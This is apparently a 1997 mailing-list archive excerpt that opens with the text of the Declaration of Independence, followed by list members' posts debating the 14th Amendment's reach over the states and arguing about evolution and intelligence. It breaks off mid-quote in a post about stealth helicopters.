	 U N I T E D   S T A T E S   O F   A M E R I C A, 
 
		    In GENERAL CONGRESS assembled. 
 
 
When in the Course of human Events, it becomes necessary for 
one People to dissolve the Political bands which have connected 
them with another, and to assume among the Powers of the Earth, 
the separate and equal station to which the Laws of Nature and 
of Nature's God entitle them, a decent respect to the Opinions 
of Mankind requires that they should declare the causes which 
impel them to the Separation. 
 
     We hold these Truths to be self-evident, that all Men are 
created equal, that they are endowed by their Creator with 
certain unalienable rights, that among these are Life, Liberty, 
and the Pursuit of Happiness--That to secure these Rights, 
Governments are instituted among Men, deriving their just Powers 
from the Consent of the Governed, that whenever any Form of 
Government becomes destructive of these Ends, it is the Right of 
the People to alter or to abolish it, and to institute new 
Government, laying its foundation on such Principles and 
organizing its Powers in such Form, as to them shall seem most 
likely to effect their Safety and Happiness.  Prudence, indeed, 
will dictate that Governments long established should not be 
changed for light and transient Causes; and accordingly all 
Experience hath shewn, that Mankind are more disposed to suffer, 
while evils are sufferable, than to right themselves by 
abolishing the Forms to which they are accustomed.  But when a 
long train of Abuses and Ursurpations, pursuing invariably the 
same Object, evinces a Design to reduce them under absolute 
Despotism, it is their Right, it is their Duty, to throw off such 
Government, and to provide new Guards for their future Security. 
Such has been the patient sufferance of these Colonies; and such 
is now the necessity which constrains them to alter their former 
Systems of Government.  The history of the present King of Great 
Britain is a history of repeated injuries and usurpations, all 
having in direct object the establishment of an absolute Tyranny 
over these States.  To prove this, let Facts be submitted to a 
candid world. 
 
     He has refused his Assent to Laws, the most wholesome and 
necessary for the public good. 
 
     He has forbidden his Governors to pass Laws of immediate and 
pressing importance, unless suspended in their operation till his 
Assent should be obtained; and when so suspended, he has utterly 
neglected to attend to them. 
 
     He has refused to pass other Laws for the accommodation of 
large districts of people, unless those people would relinquish 
the right of Representation in the Legislature, a right 
inestimable to them and formidable to tyrants only. 
 
     He has called together legislative bodies at places unusual, 
uncomfortable, and distant from the depository of their public 
Records, for the sole purpose of fatiguing them into compliance 
with his measures. 
 
     He has dissolved Representative Houses repeatedly, for 
opposing with manly firmness his invasion on the rights of the 
people. 
 
     He has refused for a long time, after such dissolutions, to 
cause others to be elected; whereby the Legislative powers, 
incapable of Annihilation, have returned to the People at large 
for their exercise, the State remaining in the meantime exposed 
to all the dangers of invasion from without, and convulsions 
within. 
 
     He has endeavored to prevent the population of these States; 
for that purpose obstructing the Laws for Naturalization of 
Foreigners; refusing to pass others to encourage their migrations 
hither, and raising the conditions of new Appropriations of 
Lands. 
 
     He has obstructed the Administration of Justice, by refusing 
his Assent to Laws for establishing Judiciary Powers. 
 
     He has made Judges dependent on his Will alone, for the 
Tenure of their Offices, and the Amount and Payment of their 
Salaries. 
 
     He has erected a Multitude of new Offices, and sent hither 
Swarms of Officers to harrass our People, and eat o5Ubstance. 
 
     He has kept among us, in Times of Peace, Standing Armies, 
without the consent of our Legislatures. 
 
     He has affected to render the Military independent of and 
superior to the Civil Power. 
 
     He has combined with others to subject us to a Jurisdiction 
foreign to our Constitution, and unacknowledged by our Laws; 
giving his Assent to their Acts of pretended Legislation: 
 
     For quartering large Bodies of Armed Troops among us: 
 
     For protection them, by a mock Trial, from Punishment for 
any Murders which they should commit on the Inhabitants of these 
States: 
 
     For imposing Taxes on us without our Consent: 
 
     For depriving us, in many Cases, of the Benefits of Trial by 
Jury: 
 
     For transporting us beyond Seas to be tried for pretended 
Offences: 
 
     For abolishing the free System of English Laws in a 
neighboring Province, establishing therein an arbitrary 
Government, and enlarging its Boundaries, so as to render it at 
once an Example and fit Instrument for introducing the same 
absolute Rule into these Colonies: 
 
     For taking away our Charters, abolishing our most valuable 
Laws, and altering fundamentally the Forms of our Governments: 
 
     For suspending our own Legislatures, and declaring 
themselves invested with power to legislate for us in all cases 
whatsoever. 
 
     He has abdicated Government here, by declaring us out of his 
Protection and waging War against us. 
 
    He has plundered our seas, ravaged our Coasts, burnt our 
towns, and destroyed the lives of our people. 
 
     He is at this time transporting large Armies of foreign 
Mercenaries to complete the works of death, desolation and 
tyranny, already begun with circumstances of Cruelty and 
perfidity scarcely paralled in the most barbarous ages, and 
totally unworthy (of) the Head of a civilized nation. 
 
     He has constrained our fellow Citizens taken Captive on the 
high Seas to bear Arms against their Country, to become the 
executioners of their friends and Brethren, or to fall 
themselves by their Hands. 
 
     He has excited domestic insurrections amongst us, and has 
endeavored to bring on the inhabitants of our frontiers, the 
merciless Indian Savages, whose known rule of warfare, is an 
undistinguished destruction of all ages, sexes and conditions. 
 
     In every stage of these Suppressions We have Petitioned for 
Redress in the most humble terms.  Our repeated Petitions have 
been answered only by repeated injury.  A Prince, whose character 
is thus marked by every act which may define a Tyrant, is unfit 
to be the ruler of a free people. 
     Nor have we been wanting in attention to our British 
brethren.  We have warned them from time to time of attempts by 
their legislature to extend an unwarrantable jurisdiction over 
us.  We have reminded them of the circumstances of our emigration 
and settlement here.  We have appealed to their native justice 
and magnanimity, and we have conjured them by the ties of our 
common kindred to disavow these usurpations, which would 
inevitably interrupt our connections and correspondence.  They 
too have been deaf to the voice of justice and of consanguinity. 
We must, therefore, acquiesce in the necessity, which denounces 
our Separation, and hold them, as we hold the rest of mankind, 
Enemies in War, in Peace Friends. 
     WE, THEREFORE, The Representatives of the UNITED STATES OF 
AMERICA, in General Congress, Assembled, appealing to the Supreme 
Judge of the world for the rectitude of our intentions, do, in 
the Name, and by Authority of the good People of these Colonies, 
solemnly publish and declare, That these United Colonies are, and 
of Right ought to be FREE AND INDEPENDENT STATES; that they are 
Absolved from all Allegiance to the British Crown, and that all 
political connection between them and the State of Great Britain, 
is and ought to be totally dissolved; and that as Free and 
Independent States, they have full Power to levy War, conclude 
Peace, contract Alliance, establish commerce, and to do all other 
Acts and Things which Independent States may of right do.  And 
for the support of this Declaration, with a firm reliance on the 
protection of divine Providence, we mutually pledge to each other 
our Lives, our Fortunes, and our sacred Honor. 
 






From ravage at ssz.com  Sat Aug 23 20:58:38 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 11:58:38 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240358.WAA28187@einstein.ssz.com>



Forwarded message:

> From: "William H. Geiger III" 
> Date: Sat, 23 Aug 97 22:37:02 -0400
> Subject: Re: Reproductive Rights and State Benefits (fwd)

> >Would you be so kind as to explain exactly what the 14th brings to the
> >table that was not already covered in the original document? We didn't
> >need the 14th and still don't. It was, and still is, a political ploy to
> >get people to willingly (through ignorance) comply with a bunch of
> >schills.
> 
> Nice try but it was you who brought up the 14th in your original reply to
> my message. An intresting debating technique present and argument then
> blame your opponent for brining up that argument.

You're the one trying a straw-man, I was simply asking a question based upon
several comments you have made both in this exchange and in others as well.
It had nothing to do with your original question but rather an attempt on my
part to expand the discussion to include the 14th which it must to be whole.

Or is your view that you are the only party who may bring other issues into
this discussion? Because, my personal opinion is that I don't need your
permission to include other issues in the argument as long as I feel they
are relevant and can justify them.

> Clause 2:  This Constitution, and the Laws of the United States which
> shall be made in Pursuance thereof; and all Treaties made, or which shall
> be made, under the Authority of the United States, shall be the supreme
> Law of the Land; and the Judges in every State shall be bound thereby, any
> Thing in the Constitution or Laws of any State to the Contrary
> notwithstanding. 

> This trumps any argument you have made on this issue so far.

Not really as it clearly states in the first clauses where that authority
comes from and the 10th clearly puts limits on what expansions the courts
and legislature can do with the Constitution. The last clause also clearly
states that the constitutions and laws of any state are not superior (but
does not deny equality as granted in the 10th) to the laws and treaties of
the federal government. The last clause also provides even less reason for
the 14th.

Face it bud, you ain't got a foot to stand on.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From PyroDaft at aol.com  Sat Aug 23 21:06:17 1997
From: PyroDaft at aol.com (PyroDaft at aol.com)
Date: Sun, 24 Aug 1997 12:06:17 +0800
Subject: Mailing list
Message-ID: <970823235047_924507634@emout14.mail.aol.com>



I want to be on your mailing list






From nobody at REPLAY.COM  Sat Aug 23 21:29:11 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 12:29:11 +0800
Subject: No Subject
Message-ID: <199708240414.GAA27979@basement.replay.com>




Only for the moment we are saying nothing.

- A'Tak A'Tdorn
        






From mnorton at cavern.uark.edu  Sat Aug 23 22:09:56 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 13:09:56 +0800
Subject: Reproductive Rights and State Benefits
In-Reply-To: <199708240333.WAA10310@mailhub.amaranth.com>
Message-ID: 




On Sat, 23 Aug 1997, William H. Geiger III wrote:
> 
> Well i think that you also have to take into account the political setting
> of the times. The Framers of the Constitution were representatives of the
> States all of which had 1st Amendment protections in their State
> Constitutions. Their concerns were not with the States but with a Federal
> Government overriding rights already protected by the States.

Perhaps so, but that says nothing about the federal gov't 
enforcing the First Amendment to the US Constitution against
the states, irrespective of the provisions of their constitutions
or other laws.  It is a difficult thing to get from "Congress 
shall make no law" to "No gov't anywhere in this country 
shall make any law," but we've managed to do it, probably to
our credit on the whole.
MacN






From mnorton at cavern.uark.edu  Sat Aug 23 22:17:39 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 13:17:39 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240347.WAA28140@einstein.ssz.com>
Message-ID: 



On Sat, 23 Aug 1997, Jim Choate wrote:
> If accepted as fact this provides even less reason for the 14th. As it
> clearly does not prevent federal rights over-riding state rights.

Jeez, it's too late to conduct Con Law Seminar 701, but focus
on "liberty" in the 14th Amendment as transfering the Bill Of
Rights, or most of it, to govern the states as well.  OK?
Cause that's the SCt's view of it, and as I've said, it seems
to work reasonably well, reagardless of the chinks in the logic.
MacN






From kent at songbird.com  Sat Aug 23 22:23:30 1997
From: kent at songbird.com (Kent Crispin)
Date: Sun, 24 Aug 1997 13:23:30 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court appointed attorneys")
In-Reply-To: <19970822224234.61793@bywater.songbird.com>
Message-ID: <19970823221015.57855@bywater.songbird.com>



On Sat, Aug 23, 1997 at 10:43:19AM +0100, Adam Back wrote:
> Kent Crispin  writes:
[...]
> > In practice it seems to 
> > be the case, however, that intelligence and "evolutionary competence" 
> > are negatively correlated.  
> - DEA agents
[...]
> There are lots of things around which will kill you slowly, or offer
> you a measurable though small chance of dying young, but this usually
> doesn't affect that persons chances of reproducing.  Examples might be
> smoking, heavy drinking, overeating, etc.

There is little evolutionary pressure on anti-survival problems that
arrive in later life.

> 
> > I think this goes a little deeper, in fact.  The kind of
> > intelligence that leads to high technical achievement is not even
> > necessarily a kind of intelligence that favors survival under
> > difficult situations.  If society dissolves it is my belief that
> > computer geeks, like us, are not the ones that will be most likely
> > to survive....
> 
> So start collecting guns and doing target practice.  Intelligence
> includes ability to adapt and forsee likely future events.

In all honesty, I do not consider building up a massive private
arsenal a la Tim May as evidence of evolutionary intelligence -- quite
the contrary.

On the other hand, knowing how to shoot, and handle guns, *is* a
useful skill. 

[...]

> The problem is that from a purely scientific evolutionary point of
> view, the human race is surely regressing, the masses of negative
> evolutionary pressures are certainly pushing this way.

Are you falling into the teleological trap? And if that's so, then you
and I are inferior to our forefathers, and your judgement is therefore
suspect :-)

[...]

> The real problem is that the pervasive bleeding heart
> socialist/communist welfare system mentality will ensure that you'll
> never manage it.
> 
> "The children" is a war cry which will ensure the continuance of state
> funded negative evolutionary pressures.

In general, I would say that you are describing a remarkably
simplistic view of evolution.  Off the top, two things I think you are
missing:

    - first, you make the common mistake of assuming that evolution 
    has a purpose somehow aligned with your moral view of things

    - second, more specifically, you assume that evolution favors the 
    development of highly successful individuals.  This clearly does 
    not follow -- herd behavior, for example, is a *successful* 
    evolutionary strategy.  In human terms, "never underestimate the 
    power of stupid people working in large groups".

BTW -- halfway through "Snow Crash" -- *very* entertaining, though 
hardly a society I would want to live in.  Also, if you can find 
either "Half Past Human", or "The Godwhale", by TJ Bass (I think), 
you will find a very thought provoking alternative human future.  
These books will probably be hard to find, however.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From ravage at ssz.com  Sat Aug 23 22:28:19 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 13:28:19 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240526.AAA28542@einstein.ssz.com>



Forwarded message:

> Date: Sun, 24 Aug 1997 00:04:51 -0500 (CDT)
> From: Mac Norton 
> Subject: Re: Reproductive Rights and State Benefits

> Perhaps so, but that says nothing about the federal gov't 
> enforcing the First Amendment to the US Constitution against
> the states, irrespective of the provisions of their constitutions
> or other laws.  It is a difficult thing to get from "Congress 
> shall make no law" to "No gov't anywhere in this country 
> shall make any law," but we've managed to do it, probably to
> our credit on the whole.

If that was what he had it would truly be great, unfortunately we don't have
that. What we DO have is the feds and the state governments doing everything
they can to get around limitations such as this. In effect we have exactly
the opposite of your supposition.

The fed's are currently deciding on just exactly how federal employees can
express their religous beliefs. Do you really think the founding fathers
were so stupid that they wouldn't have thought of this if their intent
was to truly prevent any government from enacting such laws?

 
				ARTICLE I. 
 
	Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to assemble, 
and to petition the Government for a redress of grievances. 
 
 
If you really believe what you state above I have a few of questions:

[well actualy I have a lot of questions, but it would be pressing the
 point I suspect]

 *  How does the federal government justify their limitations on the
    Native American Church or the Coptic Church when federal laws
    relating to religion are clearly prohibited?

 *  If we truly have freedom of speech and the fed's respect that,
    just exactly who passed the CDA?

 *  If we truly have freedom of speech and the fed's respect that,
    why is the fight for strong encryption being fought so hard?

 *  If we truly have freedom of press AND the feds are the only agency
    per the Constitutio to regulate inter-state commerce then how can
    one state arrest citizens of another state when the 'crime' in
    state of the accussed isn't a crime?

 *  Why has the federal government NEVER passed a law detailing the
    process we may use to petition the government for greivences? It
    clearly is not meant as a reference to the courts.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From ravage at ssz.com  Sat Aug 23 22:30:35 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 13:30:35 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240529.AAA28585@einstein.ssz.com>



Forwarded message:

> Date: Sun, 24 Aug 1997 00:11:52 -0500 (CDT)
> From: Mac Norton 
> Subject: Re: Reproductive Rights and State Benefits (fwd)

> On Sat, 23 Aug 1997, Jim Choate wrote:
> > If accepted as fact this provides even less reason for the 14th. As it
> > clearly does not prevent federal rights over-riding state rights.
> 
> Jeez, it's too late to conduct Con Law Seminar 701, but focus
> on "liberty" in the 14th Amendment as transfering the Bill Of
> Rights, or most of it, to govern the states as well.  OK?
> Cause that's the SCt's view of it, and as I've said, it seems
> to work reasonably well, reagardless of the chinks in the logic.

Unfortunately neither does the 14th respect any right, only immunities
and privileges (which clearly are not rights since they can both be
revoked by the granting agency) but it doesn't work because it allows
the feds to intrude in areas they were not meant to be involved in.

The original Constitution already had a clause applying the Constitution
and all laws derived from it to the states and preventing judges or other
agencies from bypassing them. So, given that such extensions were already
in place just what does the 14th do?


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|







From mnorton at cavern.uark.edu  Sat Aug 23 23:03:35 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 14:03:35 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240529.AAA28585@einstein.ssz.com>
Message-ID: 



On Sun, 24 Aug 1997, Jim Choate wrote:
> 
> The original Constitution already had a clause applying the Constitution
> and all laws derived from it to the states and preventing judges or other
> agencies from bypassing them. So, given that such extensions were already
> in place just what does the 14th do?

Well, quite a bit actually, as interpreted by the SCt.  It makes
many, perhaps all, of the Bill of Rights prohibitions on Congress
applicable to state gov'ts as well.  Art. VI, to which I think
you refer, does not do so of its own accord.
MacN






From tcmay at got.net  Sat Aug 23 23:21:41 1997
From: tcmay at got.net (Tim May)
Date: Sun, 24 Aug 1997 14:21:41 +0800
Subject: When did "Congress" become "States"?
In-Reply-To: <199708240333.WAA10310@mailhub.amaranth.com>
Message-ID: 



At 10:04 PM -0700 8/23/97, Mac Norton wrote:
>On Sat, 23 Aug 1997, William H. Geiger III wrote:
>>
>> Well i think that you also have to take into account the political setting
>> of the times. The Framers of the Constitution were representatives of the
>> States all of which had 1st Amendment protections in their State
>> Constitutions. Their concerns were not with the States but with a Federal
>> Government overriding rights already protected by the States.
>
>Perhaps so, but that says nothing about the federal gov't
>enforcing the First Amendment to the US Constitution against
>the states, irrespective of the provisions of their constitutions
>or other laws.  It is a difficult thing to get from "Congress
>shall make no law" to "No gov't anywhere in this country
>shall make any law," but we've managed to do it, probably to
>our credit on the whole.

I don't find it surprising. Besides the more recent, and of course more
heavily relied upon, "equal protection" language of the 14th, I think
another important factor is this: states admitted to the Union were
expected to adhere to and uphold the U.S. Constitution, and Congress even
scrutinized states for evidence of this compliance.

(And a clue comes from the oaths of office taken by officials in _all_
states, so far as I know: they swear to uphold the U.S. Constitution. Now
how well they do this, and whether they adhere to the original intent, is
open for discussion. Still, food for thought.)

In looking over some search engine returns on this issue, I was drawn to
the various religious freedom decisions, such as Epperson v. Arkansas.
Here's one summary (from http://www.natcenscied.org/courtdec.htm)

"Epperson v. Arkansas: In 1968, the United States Supreme court invalidated
an Arkansas statute that prohibited the teaching of evolution.
The Court held the statute unconstitutional on grounds that the First
Amendment to the U.S. Constitution does not permit a state to require
that teaching and learning must be tailored to the principles or
prohibitions of any particular religious sect or doctrine. (Epperson v.
Arkansas
(1968) 393 U.S. 97, 37 U.S. Law Week 4017, 89S. Ct. 266, 21 L. Ed 228) "

How much of this decision was based on the 14th Amendment, and how much on
other grounds?

I think I'll look into look into this, as it's an interesting issue of just
when the "Congress shall make no law" evolved into "states shall make no
laws."

--Tim May



There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ravage at ssz.com  Sat Aug 23 23:31:29 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 14:31:29 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240628.BAA28727@einstein.ssz.com>



Forwarded message:

> Date: Sun, 24 Aug 1997 00:58:55 -0500 (CDT)
> From: Mac Norton 
> Subject: Re: Reproductive Rights and State Benefits (fwd)

> Well, quite a bit actually, as interpreted by the SCt.  It makes
> many, perhaps all, of the Bill of Rights prohibitions on Congress
> applicable to state gov'ts as well.  Art. VI, to which I think
> you refer, does not do so of its own accord.

* From the original Constitution:

Section 1.  Full Faith and Credit shall be given in each State to the 
public Acts, Records, and judicial Proceedings of every other State. And 
the Congress may by general Laws prescribe the Manner in which such Acts, 
Records and Proceedings shall be proved, and the Effect thereof. 
 
Section 2.  The Citizens of each State shall be entitled to all Privileges 
and Immunities of Citizens in the several States. 

Section 4.  The United States shall guarantee to every State in this Union 
a Republican Form of Government, and shall protect each of them against 
Invasion; and on Application of the Legislature, or of the Executive (when 
the Legislature cannot be convened) against domestic violence. 
 
	This Constitution, and the Laws of the United States which shall 
be made in Pursuance thereof; and all Treaties made, or which shall be made, 
under the Authority of the United States, shall be the supreme Law of the 
Land; and the Judges in every State shall be bound thereby, any Thing in the 
Constitution or Laws of any State to the Contrary notwithstanding. 

* The 14th:

			       ARTICLE XIV. 
 
Section 1.  All persons born or naturalized in the United States, and 
subject to the jurisdiction thereof, are citizens of the United States 
and of the State wherein they reside.  No State shall make or enforce 
any law which shall abridge the privileges or immunities of citizens 
of the United States; nor shall any State deprive any person of life, 
liberty, or property, without due process of law; nor deny to any person 
within its jurisdiction the equal protection of the laws. 
 
Sections 2-5 deleted

* Now please be so kind as to explain the following:

-  Where in the 14th does it mention the Bill of Rights or apply them
   to the states in such a manner that is not done in the original
   Constitution?

-  Why does the last section of the last item prior to my quote of the
   14th not apply said Bill of Rights since it is clearly a part of the
   Constitution and worded much stronger than the 14th?

-  Why does section 2 above not apply considering it is copied practicaly
   word for word in the 14th and clearly equates the states under federal
   law? Especialy since the wording of section 2 is much stronger than
   the wording of the 14th?

-  Section 4 above clearly equates the states and a citizens expectation
   of equal protection under the law, how does the 14th extend this?

-  Section 1 does something even stronger than 'equal protection' as it
   forces recognition and support of each states laws by the other states
   even if a given state makes a law that makes an action in one state
   a crime in another, how does the 14th add anything to this?

-  Is your claim that the rulings of the SCt apply to citizens instead
   of being the final arbiter for government agencies? If so, how can
   this be considering that the SCt can't instigate any legal actions
   on its own but must act in a reactive manner?

-  And finaly, why should we as citizens accept the rulings of the SCt
   as the final word since we and not the federal government are the
   ones granting the power to govern? Add to this that Constitutionaly
   the role of the SCt is to limit Congress and not the citizenry.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From whgiii at amaranth.com  Sat Aug 23 23:42:50 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 14:42:50 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240358.WAA28187@einstein.ssz.com>
Message-ID: <199708240641.BAA12327@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708240358.WAA28187 at einstein.ssz.com>, on 08/23/97 
   at 10:58 PM, Jim Choate  said:

>Forwarded message:

>> From: "William H. Geiger III" 
>> Date: Sat, 23 Aug 97 22:37:02 -0400
>> Subject: Re: Reproductive Rights and State Benefits (fwd)

>> >Would you be so kind as to explain exactly what the 14th brings to the
>> >table that was not already covered in the original document? We didn't
>> >need the 14th and still don't. It was, and still is, a political ploy to
>> >get people to willingly (through ignorance) comply with a bunch of
>> >schills.
>> 
>> Nice try but it was you who brought up the 14th in your original reply to
>> my message. An intresting debating technique present and argument then
>> blame your opponent for brining up that argument.

>You're the one trying a straw-man, I was simply asking a question based
>upon several comments you have made both in this exchange and in others
>as well. It had nothing to do with your original question but rather an
>attempt on my part to expand the discussion to include the 14th which it
>must to be whole.

>Or is your view that you are the only party who may bring other issues
>into this discussion? Because, my personal opinion is that I don't need
>your permission to include other issues in the argument as long as I feel
>they are relevant and can justify them.

>> Clause 2:  This Constitution, and the Laws of the United States which
>> shall be made in Pursuance thereof; and all Treaties made, or which shall
>> be made, under the Authority of the United States, shall be the supreme
>> Law of the Land; and the Judges in every State shall be bound thereby, any
>> Thing in the Constitution or Laws of any State to the Contrary
>> notwithstanding. 

>> This trumps any argument you have made on this issue so far.

>Not really as it clearly states in the first clauses where that authority
>comes from and the 10th clearly puts limits on what expansions the courts
>and legislature can do with the Constitution. The last clause also
>clearly states that the constitutions and laws of any state are not
>superior (but does not deny equality as granted in the 10th) to the laws
>and treaties of the federal government. The last clause also provides
>even less reason for the 14th.

>Face it bud, you ain't got a foot to stand on.

 I have yet presented an argument for nor against the need for the
14th Amendment. This has been your own private one man circle jerk.

The position I presented was that the States do not have the power to deny
its citizens the rights protected under the Constitution of the United
States and the Bill of Rights. Rather than debate the validity of this
position you have conjured up this irrelevant issue of wether or not the
14th Amendment was/is needed.

Whenever you sober-up and come back down to reality we can debate the
issue at hand.


FWIIW I do not believe that the 14th Amendment was needed IMHO as the
rights of the citizens were guaranteed under previous articles of the
Constitution. Once again taking into account the political climate after
the civil war the Congress felt that this needed to be more clearly spelt
out via the 14th amendment in an effort to insure that the recently freed
blacks received the same protections under the law as the rest of the
citizens (13th & 15th Amendments were of similar nature).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM//J1Y9Co1n+aLhhAQEBrQP9HSZUbStWQbl0n7PxaC5K+U2dCf0MbYLE
qFrpkNWWgw5akWPDimp9jWhqF+/uAZv7wBxXTYPTVXncGSKD6geRcgPZxJmQpUGw
43x6kNwgWLptiWyFFhgz2pSJG4fFnOrjCWRkOttho1uKxp6UhMh/GI/S5lKb28h/
XJ2rRi6s1OM=
=b9io
-----END PGP SIGNATURE-----






From mnorton at cavern.uark.edu  Sat Aug 23 23:57:30 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 14:57:30 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240628.BAA28727@einstein.ssz.com>
Message-ID: 



On Sun, 24 Aug 1997, Jim Choate wrote:

> -  Where in the 14th does it mention the Bill of Rights or apply them
>    to the states in such a manner that is not done in the original
>    Constitution?

Nowhere. The SCt just said it did.
> 
> -  Why does the last section of the last item prior to my quote of the
>    14th not apply said Bill of Rights since it is clearly a part of the
>    Constitution and worded much stronger than the 14th?
> 
Because it applies to "this constitution" which addresses, in 1A
for example, only what Congress cannot do.  Which prety much answers
the rest of your questions except the last one.
[snip to last]

> -  And finaly, why should we as citizens accept the rulings of the SCt
>    as the final word since we and not the federal government are the
>    ones granting the power to govern? Add to this that Constitutionaly
>    the role of the SCt is to limit Congress and not the citizenry.

Because we accept the Constitution, and the SCt's role thereunder,
as interpreted by none other than the SCt itself, ironically;
otherwise, and I admit that there is an otherwise, this question 
is beyond the scope of Con Law 701:)
MacN






From blancw at cnw.com  Sun Aug 24 01:05:38 1997
From: blancw at cnw.com (Blanc)
Date: Sun, 24 Aug 1997 16:05:38 +0800
Subject: lack of evolutionary pressures
Message-ID: <3.0.32.19970824005637.00b63b18@cnw.com>



Tim May wrote:

>(And not even the infamous "But what if _all_ smart and educated people
>thought this way?" applies. First, what Adam or Tim or Blanc does about
>having children will not affect the decisions of others. [...]
...........................................................


I look up, startled - what; me, worry?  

There are actually quite a lot of "determining factors" which do not affect
the decisions of others.  For instance, the Constitution of the U.S., or
good genes from one's ancestors.    A lot of people read, but do not
appreciate the meaning of, the Constitution.   Too many depend upon it to
determine the choices on what is right or wrong about government activity,
without considering the reasoning behind the document or without applying
their own reasoning to its meaning.

Humans are pretty complicated, fragile creatures and there are many things
which will affect our success or lifespan; unforseen elements can overwhelm
ones's biological system (like an AID virus) or one's circumstance, (like
encounters with Nature - unexpected floods, forest fires, tornadoes, etc.).
   Many things which we do to ourselves will weaken us - taking drugs,
malnourishment,  incorrect responses to events which challenge our
psychological makeup, etc.

These discussions on evolutionary pressures, genomes, the intelligence
passed on through genes, all reference things which have been given to one,
given in the past, given to a passive creature at a time when they exercise
no influence in their own existence (i.e., at the time of conception).

There is a factor being left out of these discussions as if it didn't exist
or had no influence, and that is the particular individual who is in the
act of living their given Life.   That person must maintain a rightful
state of mind which can understand the requirements of their own existence.
   

Although people may receive benefits of all kinds, they may yet fail to
live a successful life:   some people grow up in rich families and end up
drug addicts living in the street.  Many people are super intelligent (at
least in school) but seem to have no wisdom of judgement, making very
unwise decisions which affect their success (the latest big-name killer
Cunnanan comes to mind.   He was credited for being brilliant; he took
drugs and this influenced his mental state, but that in itself was an
unwise, self-defeating thing to do).   

A person's decisions, their self-advancing or self-defeating responses to
life's exigencies, also determine the direction & quality of a their life,
not only what they have been given by others.   One thing which can't be
passed on very well (yet) is the *desire* to live on a certain plane of
"intelligent" life, once one has it.   

(And who appreciates so well the struggle to stay on such a high level
plane?  Sometimes there's a lot of "pressure" to evolve in the future, but
not much empathy with efforts in the present.)


    ..
Blanc






From anon at anon.efga.org  Sun Aug 24 03:17:14 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 24 Aug 1997 18:17:14 +0800
Subject: Stealth Helicopters
Message-ID: 



Anonymous wrote:

> >       There is no conspiracy by a secret government to destroy
